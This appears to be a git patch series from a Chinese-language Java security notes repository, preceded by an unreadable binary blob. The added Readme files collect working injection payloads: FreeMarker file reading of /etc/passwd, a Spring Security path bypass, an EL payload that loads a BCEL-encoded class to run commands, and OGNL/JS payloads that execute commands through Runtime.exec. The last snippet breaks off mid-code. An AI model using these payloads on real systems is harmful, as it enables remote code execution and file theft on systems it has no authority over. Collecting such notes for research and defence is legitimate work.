ziSuT5UZ+}S(nNU{LRYL7Tk&eOKjs~S11GQYi~^$fz2N#>>=rc#lP|Q#969noeHdmP z*kaugdf%Wzfuy6HAm8_gnLM&dWjqE6hXo~)!@5tiGO$qM&Ddr2)LX7U6OKNz394D2 zz3if#t%42(JwCQoqFizR-GR*XXtzrLEJodVr>-Yq&BU6(Qbi!g(A~4oi$@0M4^#6f zfRBk}i3y$jot|fOMJsOGry++#(y?}V<7>V1-ZooTTZXNAH<<^f;pak$mp8SX|2kve z!k0L3sshgS!r2cmsBo0`?^Q~s!RuM?H9t9HwsO($;Vo{@J9fCAcJq<+$L@3_E;?eS z8Vw`4`=yoy)C%b)AVxE?YF6I7N0+Lew!3Rd7fOWop{dcHkQJ$9Nds~^&m^lios zRNGqbmyXS7($)gLADgbtDNP7zV#WOaSCxn%(hP*j&}j4*FU8T|yEDK!SpClU0%E`xOKdM zV~}g^w<0qb0KUU!@SoJ%nR?rV7ROp!78zhd3&^*OYng|fDKbPjf;*1gsAikWz_+Ud zEvS8UBzlQWYJ}pLWCtG5HUJ=AtyhiWEVtP=GWq4uxw&ePAl-uJ_I~1Tn!uPnSWGU= z>f;Lkvw!)5Y6NDZT=jPAinf+@_-LeQ`jK5yg?O1#F;r^wk}@RX8c@K169GXyevqiK%RxCI#{`= z2bF8_m%}_mTI|Q*BcN6I%JGk>wL9-gHh&N>4S`51?$R=gAw)D#`ztEac$!YUSBHYF zkYuQJTNH3?MmOz=bK3sx0VG+iD)6ACAkYo?V%*>Lk_48|#$0MlhjDx)drk#TxxCT8 zZ|(&99M!qPxuz#Nu2wPB(x}tHzXnx1lYZOlm{GHrMNIHISOIWYy?%nH&VL;H^WZn$ zM%f|q1sU1`Zg`MU{=oGmxA|G;p}tKyRjZiagX4TH-J^ePh)!A zbdylUe}{tpJyKP%i21Ad{LPYwD;~(cxjc znWQku?)GrnKf$%qGgJ28yz3|(z^^6?I{$ddOqtzb85> zq2CLun|ZF*a?+Z~V}PAUiy<0`1X#_0VGt|~&Ml)as@=r`ofOH-VATPp%duD?c;!4= zZ;*_LlFqZ>Op&sh{3cZ}Ikj(Yzw`s-Th*{i*fY%2-2%Y4TsjZKVbXSJi#4BV#1Xaw zH}b!{*#1Q@V&>))7sxQ5(8}cCdRvCG>ych(J{A;kt0SxkfDh7|U`(bD|_`7In zV}^WPL9YOUn}4gFz81$xee7~CEZ3NxgY#EdIT(PR-}sn*;u?loeHT<0nT~#ZJu-y_ zo^Mpu!z%%uscRk+JjU19l@EgtoVNNaYGq6Xj;y^fI@wgnIox!TiRK-5mDF0#wVwuop0dL1jKatsC?9*K*tIWtKl0x*G8b~;`?Wle3v?&@7wi;#_sjaZklf1(8)lE=pPOBw)5$0w z1#jQCUPO9JWpQ=>{*89{gy+?7PQw;9dtORF zelmc}f1f;_dFhv2ns%0zIf>NM*E`w!h6%Hu(X>tTimvUA(MK%mc6IANuzB-&CU}eO zmVCaxzF4gRI|gDLMR+!p&?+sUV(l+cPt1c@k`B9=(o2+t}0^J)zWictbunh80~CHDU->#D<=(E2}!i6Gq#A|M?ijZ%^$MH=al z5Co)Ax}-ZDDWbG=Nh2U70wOhHATfH>w%^%(@9%l;ec$~9?ius!?8G-dv3bVV^pPot{*BjtutCQXq%0@(y zIucycJzJtQj|)XTqc6~_!mV%=qO`{IVMubea^>u|@N7h%a8KmCl5T8}#~C<8z!-2{T=U9un_9$GW*epwR`u*a=s%~Oo0tegBP3z|AkcuaU@l_%* zzQX7|rK~l$&P23-heSRb~)0Dk3QL9hzQkq$Lz0M|di1px1EoO0@4t z47d76Qstdr2R0z;pMHJYdA;^Bn$@;N;B`2VzB=ecVD6ZXavYdicr$Y2zp8+IpBnVF zR8VEif7R4TM$dhRm+F9TBQZWaJTHpwW|m^)sII0A00o(9ipqjOsV%vbXt(Y8@b;H1 zv?_2m55N1}4+P~=M<$dF<{A%HvTDTc<1=dew@<*Ry@rMpAf?rAVwVRZ=IB4k;7V=D z$jrA}`%`|FnJ@FL*%ProEElc6#gp9qY!5`6wE+9919{o(TQEm z+6Z#-!tQy5(75ZI>gRbX+Yeq*W|bPcbO2c!aJiY@uEal9_3c59{%v7mtICjtdxE4j z!>v!H@mcl;#R;3+?u<&GGoMtL6715iF!a9G=0cML&4iIDT*jbFH#7eY#I1rzTY(6; zqF!3ruR%(ABLHVT!TB{tJ&lUNJoTO>Om%A|3A|*R+uV|{DIY2;jPO~)pq!(-yElX< z$%PbuK{LshS8uwtnNcB3oj`q635rhjQUFZxLnnzO@MtN;8lb%!vEo8R~;vq ztz=4sQW+lrrS8Q`p+1G#n1-#7-dpeP8vdact%wD$A$R8qdd4?EPyhndLYD7efsvU= zi$ei3^AEpJlA}*I<0By-H94mGZ#5t3m=d&I%ToIJS^$q~?j2#fp98pr<#)u@C-2&Y z=ZFU+MW8R>gQ!(a*yko(e#u8Kd%s-n?Y_213qxxBQV}e6@bJ4AA*nI!_(;N8(Dv-d zI$Zp`xa0X`o^(!TYuX5+HS^%XoZ;k_ps0ibaCZ|A$OHF$bhk9<^a}`IFZ(LB*`!Fo z*5!y4JHC8%xk6@cH<~B?oXXU;!# z>LOVeM;h zQkWD0&_w|C=}ve#I(oH>>MIdywWnfBBI_vPmO}HR$~havLR+J!pll``HA^nU%10kI z$68zyZb973#Wm5=RmTJRrC_51L(cdu*~?d5Q~vhC0QHGYPY}w3r8b6As2x{OX{cJP z#s=RyW#oX*AoiBYe3%j&O^fdz$fsPt{$Vvj-0y@ZggsG|H0OM)N=o>4{hITQ$ zOR*Q&kw0Mes)-)>|IIWx36=UUb>dc-3UgWJ+1Uc+es2f<-I~Za)6m8@4MttVjZEgN zH~RZGy;}ZqL+C(nbwGS=(j32h3qpm+GUt!36e}XjUHuw!?=@2Y z#_PcIi2ichZq|L?bGzAxgE`J7Gk6?GrXEDOVrvP(Y>VW=Q+BMx;(T5{v&LQm$VW2fmun;QHjw5A&q|d zBeu6%7X2)EN1wTC^PxypQ*r70q1vB;%4a~FDbhdk!Hb^)f)a1(E?!BaPgin0e6b3~ z_E}mhgO;H@$^+y={-DsYss_Yhe+MGx>wLLDE}mJKdU{tyv)D;AhVfQBbgj8=U_98& zDY_BBUqMaF&_bgI6dzV4*dFQ~2=X7to|=JNn@nReBRks)T*!kZ8(+w6%x*WC#3h$P zUiN13^janYVa;&)h`>Da%h`Mz`1jnR8VZowHn#`+%K%N<1;lB2xaViSCxd($XVT=yjQs9lty;I+BhBHo5>ejQBj!x{?h8hAG3{|aH| zHSZ1>na*sSa59SOy$I!32dgS(mp{p*P@Q;1F#Bza>i#f89(KW*34TWx7ry;3%B7Q0 zz80HGhKyEkxydsswxWx2&!w6xbnkzi)a>Xfl|?yVxw2JmaN6+ja0Q`cizOeWnnB9& z&m3o?m^0bKJfbvEj<~@knaU|i_wM?dNgOuOg<}@+=q2^9S#bl8_W7S=#o0&430x1b zKEhbh9B^zr1fV0S%e`)3Um(zQ-AjUDEUnZbb=34@6z~C|6aBP2&~+u~kRwRWaSDLW zY9kJM-rJw{n9+#AE|Fc&kb=U(@_aI-;P1jCBE)_Fkmq0ghBqGI$)N=6jl5NPd3b=U z3Rc#2U?pC--S1&{clW2fjOV@46e8c->A4+x8h=9jnM#4f$wB>=VVmy*DF630FeLwz z+WcaVHGJUdofu2c%Ru8!e}m0;jdp)2gvfo!8DaVS`5UHlC=(3i$JFacvt?y6+fCW& z9k0PPcdTpqzBeymjQ0aEXVA^ptVnk+QmH6k6W71LSG4$E?`$AH-H~Rl9-Ly84!{5S zv7j=p-|z$)W~mA<^8vu8Nj$L!fKzOsccUut>TQ>s8N;0?w!*AqW))I@gTnBXqueqL z?I*LgEFdU^rC1R$m57N&no?{QqLexNP4N;ZvPi3^jm)=c>Ta&X*}ey^aRdC0zF60x ztLHsl%dHkjQf$`H+CbxD_qg;tUO=Y^euIZOjn8=<#zT-XP(wf|g?yqh zPo|IH57<<5n)zkB^Xp5>be2k&KJnF~W=0N3&eBj2iW!{UPSLW-BXI%_<{yVOign&Q zB^7e!0XO21_bLF=5~svad;}g6EgJ z2sGdI0$7e_jDfM*G@n7j6SoMN=0*~vX3uBztDCSZk+DTzcw#_>EfD!SC>>Z@0dR&* z;67E5c82ZGEtMZok#K)$0(^e8C>;pl#Cb zHG6f)|FTbLDkJ>@Vb1qwpZ^f^VkiJN4S99jCa-<U+Jxg z`Kh*onUuTlq~`utqQHb(cG0DIzR|9z1`KN~?;PR8rpS&mHGvnQ#m5i5#gvkyijR4X z%qr!BQpqx6ADhy;USJ*OgOCU`0|?O8D$#!`vC0^uot=*gJQ8k6hRLxQrclKw0vUA` zK&dg{0jR9*orcBl95Va2epZ+c1t919fqb*8u$b5YP`U>gm?(lE`EfHu<75nz>m?Fl zP&&}Tk2p2mg^wbRX&4!8!RDrEX*&LCd=_SYdX1nPNTxF`A%if;bug{Q%L_B~Y;V<`8*ZSCj)5+TEV6@KlW{fxEIb zX*BSpRR1ly^_)4q ztgq@e|8Sl%iw0p2+X<|7aT2m5# z)Mk)L$oY3MJ)jVm?b@Chbm58t^!Pon?+-RLgN#IIO_7q(Blx|=UBZM|gTjtua$%uk zg%XzHNe32{xZGChQLHMO(xeDb1PA*=xtReKXs%~WfgdIZZM-SoH

-KVZw1uE0~f z?Oth6E$8vOg$2v01YHv#RW1REvN#jv9x7ler`DKMzjVR+Jyf)v7`e3WD}m#PrS+z* zEtr6)X!ZLUMS>rHe*)k#fJ;&?*7@x<=d2EaxMLlW1CF%6fkR#|vF)cDXD>2dUBIZt zi#Itrd82vHBssBD$fB=)r)NXYTPiXr-9a{#wfY*j`VU+8VZ3hUqpqHAD~CTt7Sxv3 zAe7V@#MZ~Lw$3h1Ym}e~0?15MuNQe+JJB$Hbg=Asp)7ENzFBKv%E0DoS2XVOS-)F= z0KLqFej9|U#5@40GxiX`TA@X;8h!kpevk7(wg$LHk_2l(+=i7$0I~PY;5U^)s4Xmr zSCzqVAaQ*K_^!TviwoAhnrJpVz_9rtU4YHi&z{n~)BTk}Ofo*;+-2XD?|Ly~PR;6b ze7b+==Kh}J63E4Ho~(~pfoPOudJ1bF1HOgM8Xg`#MAz_IoH~QEXf`&g0%r)gP(jku z-icB1rTWT^7RB#14l5F<6-hhN0k$1v-FyxSQwXGD?D`Bf7OIF9_68vUsQn)fY6d2O zpJZ2YK}k&|t8?v}yW~3fhWAl5+lQm<3+b5_^y75g%&bN5r`r)0@B#Ssjoj>ed(MuJ z!{1Ne@QWPo#Ci6a!A68^T(Y+FGIQk z)R9k!=X;)eZ4TtEI~M6WMC;Sa3xC+W-qap5Z`9-5z!e@~WRahOuyA-^Xytg_sHjj; zqMlc@db5tYjhiw?uly2Ym#{x}jRk*&{V}ql_Se!-{6cOC8(<092ae zWVrYyAzS|%gha(>~o4;nobU{60D@>D}45b3n5;Q)^VYJJHW%we|YVl2V%!LlW*gGnKTl{LZ zSX_uhw4q|=vqgK6q$cgzV{USM6}fmhs1_$Vh8%QimVhmuHCro=1P%__0~LkGdLND8 z0AaZ_GgSJ)nDXJ`OR~T8<@cY0=q}Ii+(Bxz@aLynlfC+fo+|7{e8oCkG-L@2w{YTR z(P9?VH2|yn$OG5-GbI?-$#zYW2Lsn;IwQrIe;!!mj6SO*K+97Mm`dOPUBdm)ghK71 zV|y)sR}ijNY=K^AMk{*4SpK{Xhw4;r;0P)}z}0(;-DUAz3_BkHboaX@Rg)|QkCQG1 z3wrwGv{b0cmIX$YgZzs0P}PB4zj7LEFBP4hPEZ{^A(RK$>|6-E zhRFs$eRKc)ll1z-*V^)Dl2T;t+0(JsO~MuFzJ}iWhZuOxZxYlH3dv7(e438BnRbRr ze~mWWJ)E|TCuM^~+$IJ!T`rf`?OPD6G#G8-%y!8{*QH247ie9-%r(SHbv3jfOv9R| zGi)p^gZ~822qZIJ?VRpepNb1LesSLscgeBIMjHLh4=q$rtt>j1sU8l1oOd}kn}H!D z8`wDj@wvAr0G0FSTSS8dMttF0H0dCb3n|b`{6>+vM{)IWL1^NFAh?wE z%Tt~5(&N$w+>${j8>)q)Ob}GOi5?r%BE7Zi!wA;A9JF(L+lh3DSHr&864tWAAAL=J z`|&EefU)OWw;MR~GlRttO8UH_-jp)tsQS}Z!}FsWGmP3uu^EOZ`%zIfue0iam0C~E z?KRFvP_6g#E*#MySWmXnfi{w#rVaMXqW7OwTyafxbOnZ+03&3|?4ZX9hacAnIGF56AP1%y+E?SNeiPLK-c(y$#!r5D_NLlMV2l=iGGBXvqUpl>jQmc`5 zzUg74VZyl})VijW`EklIX_)+KS0`lp*!nRS_X42o_PY(NxepGS>TmMfrETr+G2oY| z#eV8E{~eVWe+VlrPxAs1+KP_fFc0!D-}_rngOPu{EhpvWyCw(pI=`$Y|3Y1sIP}e} zb2;1ui^MTcn&FJl$3%0arlJQlLYbri&q}EJ7KFyb8eHr8<5C=l##5PZ!n_@z)(O!x z)1Fvv`pcIBf?w#Vsjc$(REUrw$^#eE^B{tE=q`djlnQ%!du&&XZz#X~s%lwaFsS7Iar zC{?QTut&2434_5Cua$S%i(Rwj_Vt%|8;lZdy@Ys~lLt+fviR1LfC#W636S|zzxV3x zO7q_rA&4(m-QRDWs!2U8GJjmAr;3jORHWr)3#m~*HR>U??rF2iC#931)TGTxK42|0 z7+hyosavL(q*u%tO-)U$%vxWp8S=aF4K)prCe+jkB#>7=_iHmF<@zWQ?J5;+QB_ry z;BBT{YuB`#PzdTF;1En6Dc93(s>mkaS*1>CHTSmJR;D~&b>n|nIYDluG^olh4-8KY z0Nw3Nm9wNahngqlUfQWY=YoN?dP{6BBQ33J95(FyU~e7T!ZSPoi{%Md&`voe^=z59 z-d1oaDE3vN)K5bjx6DH(Hs4rp4xO#&U_TR+whCfpsQZ3D*= z8Erxjq!>GxvN$D_e77GbIr*<%u=6uJ{?>(R`3D_&zQf8rj)XmX+Ymh(``0qSrbQqu z!tW)zvR;mfglVjia+@u1wi_Ew_7cL>a_<*uaq^j8;XUC{mgukUSHHWuYvixC?fkqy zk4vA~g+ZS4Mp3~d->Hp#)J8RI3HH6N(sW_L)|Da6?@C8wa)99C+WGy;mh>jrv-@4E z`yYF`o(jFVJI1FMsG@lk zT_H>R4pE0;ycSfem2g}{!$dJvN9nII|2_0D*ogd3%Ot&fPjh@;yllEHQ)Ia|mBK&t zw2zZKdOE+s=;NF$)h5)U2M&Gq{Rsd%_ppvD`}PjNvx|C6KcpmLm?evq?&{jXE@BY< z92A(GgAD`5p?B=D$q(A)eePF&qVkbz9Z7JoF!JXHY>Aw9SRy$;j(nz(7Ze#Qw;!Ui zcYiTny6TEWU@oV99pB5d%0&ur{5>%Z`zz_h&hB3$<-^S?i8_Jmjd1cw%i1$?Q@!5! zGPJ$VP43FU_a(`>3C=I9U$@~l`ZyUsvvG2BQ*IX4`wd6>q-e8W*7XT%09&iFp+%o6 zy)ZuPf{f_LG;BcMl=HzSWiH#aUU%uAtNUzimS#KX1=~CqrPjDfKAo!$QMvEMAU5Y& z45b3aa?7dXf=@rj!fsIWo)D{jzfG0P)MY?J!)=>H7B}wO&6FhvJ^lKK%l7Z#{{3UY znlzrKEG4laiv+q!V$VW?t6fB*h&$+HBWE(HjUO?cI;63GFz-Dwy5fA`PZ8aK=j-9a zee+1m<1#tWZo-#XHC->K@5od*1t5ca8E$X3E!$_tU=)9w&!7VtD`1vs+0l0;7hHcL z{DxTK`Z>jet!xY~o9g*>JkFY11KLuA(vfHK`ym?SeX1ETqihEk2k`AfDwHP0%W^Hw zv?s(@LzlUIoo&$IU;h~S{=Gte-hmIW|61kQ5qCZ^1Mb;BUuj$DkVR{w^Uvp?-nEII z)DOOa#s802x4$nBYB37`^K)>Ly9z~}Atr)j|999Q8lC=Y z3M2pL3rW^4RR8z;r6*XYsQl|7klSB>_1NMbpw4wO6UY;EcOnBo0vxyUocekm-1K9A z*}um=JBC1lg0X_O0=eQwGlcl+Ont6De{{j^+rn8TKuM&z0^FK709@wY6btvE4tG<@ z`>*A+7V3}%vQ4;8MoE;7p^7OxfxL)Dw?Hg{-Ug_Za7F_j8)r1IB^X4e-gx)#^S0c| zkg^?7xFykC0bruZavId(8_k@98O$j{IxH(a6+2y-*Yqs z3Jf%9Y>eg8%+O7x>K|9L+8!6stV$(W6Cj)V(PVSk(be*y5}?T0A7cMF&{pt3;w^X)4R_W+4XP5v%3{NJc6c0H< zhf{2t8A?nn2ka3DBIMOeb+@;-JKb_Dqm!M5#pD(K^RQ03tCDz?tY6S%It+19JvgHQ{K|B{^wEf;3f;ek$e+Q4Q75st_WP< z#AIZYvP#Nnge|DMkO9DTLqR(fg$fvkzXA~BGWEZQs_-JR;DZ5epQq_f7UF(EP$&c< zC!oDc8FOvhe|b?VxG*e2VOH$?lq|Lbb*JOSL0f zzj~VTtgI{DVsWf>$=f+O62p9SxbeY1P`^pN$ti0i^~E>%(5TU~i29`U8=aFd>32K2 zJI2xJbLLMXPY&0&=3amQFVclHy@(4M>I&hlrq4mz=Afod{OwUD1Y zr_q5-x3!-e{@QWFvoe9Yql;0_#2yL>M2 z+non{yYn>H3rB%yI?u8t`?bD9sZfi^kPy6_{QT}jNKj^%nvU2 z8?*Lo&+p3PjTvbXDjJI&WxcAlZ&9WR#R9#%-U-}N_D3SSW1`oa*$p>#6Mjy}GVa`AP>-_w&yq5luJ3Q@NDJu6KYrMJ`d8#BChr zPW|4Ey%|e|llT;IN}_#V6Mbdvv7}kv*tlsPB-}SUOH-86*xs&GIX$Ergz1i#z|=T= zt_`!}xvithS^Rv+N#=+7L#CHLK2bzL=(mH`!Gk-CH-m8;>Oyrs&cqlSYSM7?(^$i8 zcq7l;1`lUxdoqbI-#f8WzleJ*Z?7hz%KOdif#$R6vCe?XV zdFF&E&s<36lk-;i%C!Hb$upN+tF_LtW?iV6dq*R?oBYkUdeiZ;(;5a!Djd0N0Wzq#Zmbvn5oWO+_SL2SipG&=MqoBCI9__gv}rhc&I2s6e{GN2mc=x C)`YYG literal 0 HcmV?d00001 From 5bd59c306d8c9e9d3e6aeab55a1070575cde8af4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 19 Apr 2022 11:53:56 +0800 Subject: [PATCH 030/332] Create Readme.md --- .../FreeMarker/Readme.md" | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 "java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" new file mode 100644 index 0000000..fd33fdb --- /dev/null +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/FreeMarker/Readme.md" @@ -0,0 +1,9 @@ +# FreeMarker + +读文件 +``` +[#assign ctx=springMacroRequestContext.webApplocationContext/] +[#assign url=ctx.getResource('file:///etc/passwd')/] +[#assign is = url.getInputStream()/] +[#list 1..url.contentLength() as i]${is.read()}[/#list] +``` From 6d434c7ac9d52250a3088e6ee8bfeed404b4a1ab Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 19 Apr 2022 12:10:18 +0800 Subject: [PATCH 031/332] Update Readme.md --- Spring/Readme.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/Spring/Readme.md b/Spring/Readme.md index 93a82aa..0129415 100644 --- a/Spring/Readme.md +++ b/Spring/Readme.md @@ -4,3 +4,10 @@ + [cve-2016-4977]() + [cve-2017-4971]() + [cve-2018-1270]() + +## Spring Security ++ [Spring Security / MVC Path Matching Inconsistency(CVE-2016-5007)](https://mp.weixin.qq.com/s?__biz=MzAwMzI0MTMwOQ==&mid=2650173852&idx=1&sn=6b4a6c36c456b5e475b5247451c6dd81&chksm=833cf5aeb44b7cb895e1f67f8f6680e1a22124ce5e9e38d8a5e5321099f40e8acc01ac9e3c85&scene=4#wechat_redirect) + +``` +/%0dadmin +``` From 8d5c616dea63310a3407f3e7d92808c9153ac819 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 19 Apr 2022 12:32:35 +0800 Subject: [PATCH 032/332] Update Readme.md --- shell/EL/Readme.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index a693272..24f8a89 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md @@ -29,3 +29,11 @@ byte[] array = ByteBuffer.allocate(100).array(); whoami.read(array, 0, whoami1); System.out.println(new String(array)); ``` +## 加载字节码 + ++ [Java el 2.1 表达式注入payload(复现上古版本nexus rce)](https://mp.weixin.qq.com/s?__biz=MzIzOTE1ODczMg==&mid=2247485253&idx=1&sn=b1490922c8b4dfcfde6cfdf425ea8597&chksm=e92f13e6de589af00713b3584841d20c209bf361fe1a1c2fa53e7f37432d7728da008bafde35&scene=178&cur_album_id=1359948349721460737#rd) +``` +${''.class.forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$I$7c$m$n_$A$Deval$$class$A$8dT$5bO$TQ$Q$fe$O$ddv$cb$b2$U$u$d7$827$f0$c2B$vU$f1$da$o$m$V$US$c1$80$c14$3em$b7$87$ba$a4$ddm$b6$5b$c2$3f$f2Uc$d2$gI$7c$f4$c1$9f$e2$8fP$e7l$97$5eB$8d$b6$e9$cc93$df$99$f9f$e6$9c$fe$f8$f5$f5$h$80$3bx$a9$60$Y$8b2$e2$K$fa$84$5e$92$91P$b0$8c$a4$Q$b7$VB$dcU$Q$c4$8a$C$J$f7$84$b8$_$80$P$c2x$u$f4$p$Z$8fe$a4$YB$ab$a6e$bak$M$Bm$e1$90A$ca$d8$F$ce0$945$z$be$5b$x$e7$b9$f3F$cf$97$c8$S$cd$da$86$5e$3a$d4$jS$ec$7d$a3$e4$be7$ab$U$p$cbO$f4R$9a$f6$fc$94$h$M$b7$b4$ec$b1$7e$a2$tK$baUL$k$b8$8ei$V$d3$L$XM$94$d3$u$XD$e8$k$ae$c1$aa$b7$da$ac$99$a5$Cw$Yb$X$40$be$8b$b0$91$7c$ed$e8$88$3b$bc$b0$cfu$P$3c$d5$E$9bvr$b3$cb$p$u$96$a82$ca$ecp$o$ael$9d$g$bc$e2$9a$b6U$95$n$9ce$dd$b4$Y$s$b4w$3d$K$Q$dd$d1$9d$o$j$h$ed$e1$a6$60$Hv$cd1$f8$b6$v$3a$d3$_$3a$b2$yP$wF$Qe$98$fc$L$7d$ca$d6$9b$x$95$7c$ee$d8$b1$w5$97Nq$bd$dc$f4$c9XU$f1$Ek$w$a6$b0$$cC$c5Sl$8aD$Z$n$9e$a9$d8$c2$b6$8a$e7x$c1$c0$U$V$3b$d8$W$b3$nF$M$c3m$k$7b$f9cn$b8TN$x$cf$5e$ab$l$M$pm$e0$7e$cdr$cd2U$a5$U$b9$db$da$8ck$9d3$f5$cd$d4$87$f9$7fL$ff$b5c$h$bcZMw$a5$f0$8d4KJ$d1Q$_5$ee$3cMw$p$e8$f8$94$d6$d3$n$G5$dav$f9$93$X$d60$f9$LYo$fecZ$cf$L$Z$d2$x$Vn$d1$9dL$fc$d7$Vn_$c1$b0k7M$98$c5$Q$3dL$f1$J$80$89$d9$93$i$a5$dd$KiF$3a$b8$d8$A$fbD$8b$3e$8c$91$U$8f$91$8c$f4$3ee$8c$d3Jm$820$81I$d2T$qb$84$Q$B$3e$pD_$ms$86$be$5c$D$81Wg$90rg$I$e6$be$m$U$afC$ae$p$dc$40$7f$D$can$a2$8e$81$5cJ$fa$8e$e8RL$aaC$8d$O$92x$fb$e1$f7$cf$a5$3a$o$a9$60$y$f8$b1$95$7e$da$L$a9$m$8c$Bb$3e$888$oH$R$ff$Nb$$$e8$ac5S$fat$c4j$g3D$x$8c4$$$e12E$99$c5$i$ae$e0$wU$ab$91$e7$g$fd$q$3a$j$m$fb$M$951Gg$q$c2_G$3fn$e0$a6$df$8b$b8W$g$3a$fb$Q$f2$Mc$j$3d$a0$ff$R$cc$7bZ$f3P$L$7f$A$f1$e1$81$9c$fb$E$A$A').newInstance().exec('whoami')} +``` +**需要注意jdk版本问题可能没有bcel类** +理论上spel表达式可以用的payLoad 这里也可以利用 From f4b20d932efc72f0a6e4374c76d58a577b1896a0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 22 Apr 2022 08:37:32 +0800 Subject: [PATCH 033/332] Update Readme.md --- RASP/Readme.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/RASP/Readme.md b/RASP/Readme.md index 673efb2..fc2ac3f 100644 --- a/RASP/Readme.md +++ b/RASP/Readme.md @@ -44,7 +44,11 @@ PHP是通过开发第php扩展库来进行实现。 -### 代学习 +### 学习 + +https://blog.csdn.net/HY1273383167/article/details/116211211 1 + +https://blog.csdn.net/u011721501/article/details/74990346 1 https://www.freebuf.com/articles/web/197823.html From 71be89073fdcd7fce3c47cdb1058d6b0b0fd499a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 23 Apr 2022 14:52:06 +0800 Subject: [PATCH 034/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f4b5196..476b835 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -117,3 +117,4 @@ + 2022/04/05 [JAVA RMI 反序列化流程原理分析](https://xz.aliyun.com/t/2223) **rmi攻击的回显思路,通过异常回显** + 2022/04/07 [(先知首发)从Jenkins RCE看Groovy代码注入](https://www.mi1k7ea.com/2020/08/26/%E4%BB%8EJenkins-RCE%E7%9C%8BGroovy%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5) + 2022/04/09 [Spring Boot拦截器(Interceptor)详解](https://juejin.cn/post/6844904020675559432) **注入interceptor的基础** ++ 2022/04/23 [红队第4篇 | Shiro Padding Oracle无key的艰难实战利用过程](https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247492569&idx=1&sn=a3ff25d6fb277763785213b18885b422&chksm=fd8477b3caf3fea59b39ab27229e214e5a4038dbc6925b5ccafea9481bc8952313b404f84a11&mpshare=1&scene=23&srcid=0423xysf3wTzCs7HWGlyakZM&sharer_sharetime=1650694544259&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 56c34fd0e2620b533902aab0fc4de18a0dcc824e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 25 Apr 2022 16:36:40 +0800 Subject: [PATCH 035/332] Update Readme.md --- shell/OGNL/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md index cfcbb9b..8c85bbf 100644 --- a/shell/OGNL/Readme.md +++ b/shell/OGNL/Readme.md @@ -35,3 +35,6 @@ String bypass_sm_exp = "var str = Java.type('java.lang.String[]').class;" + >参考 >https://www.sec-in.com/article/753 >https://www.mi1k7ea.com/2020/03/16/OGNL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/ + +## mybatis 存在${}的ognl +参考2022的d3ctf ezsql From f28035c18e69eb32ab65a4fcf048d4d71439805a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 25 Apr 2022 16:37:22 +0800 Subject: [PATCH 036/332] Update Readme.md --- shell/OGNL/Readme.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md index 8c85bbf..1c52c1b 100644 --- a/shell/OGNL/Readme.md +++ b/shell/OGNL/Readme.md @@ -3,7 +3,11 @@ new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码) new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B"); +可参考s2的exp +jdk9+ +@jdk.jshell.Jshell@create().eval('code'); +${(#cls = #this.getClass().forName("java.lang.Runtime")).(#rt=#cls.getDeclaredMethod("getRuntime",null).invoke(null,null)).(#exec=#cls.getDeclaredMethod("exec", this.getClass().forName("[Ljava.lang.String;"))).(#exec.invoke(#rt,"calc".split(",")))} ``` ## bypass sm 参考 js的bypass From 241321cb3a0e83f880ae653afc3c0c908e6af290 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 28 Apr 2022 17:35:38 +0800 Subject: [PATCH 037/332] Update Readme.md --- "java\345\233\236\346\230\276/Readme.md" | 25 ++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git "a/java\345\233\236\346\230\276/Readme.md" "b/java\345\233\236\346\230\276/Readme.md" index 7932c5c..27e1a87 100644 --- "a/java\345\233\236\346\230\276/Readme.md" +++ "b/java\345\233\236\346\230\276/Readme.md" @@ -4,6 +4,31 @@ >一般web服务是想办法获得response对象,可以参考[2021RCTF ezshell](https://github.com/Firebasky/ctf-Challenge/tree/main/RCTF-2021-EZshell) +### 异常回显 + +我们将命令执行的结果给Exception(result),因为Exception可以传递string,在抛出异常throw e;之后在命令执行的过程中如果目标的代码逻辑存在过程中错误抛出异常就可以看到回显内容 + +```java +import java.io.BufferedReader; +import java.io.InputStreamReader; +public class RunCheckConfig { +public RunCheckConfig(String args) throws Exception +{ +Process proc = 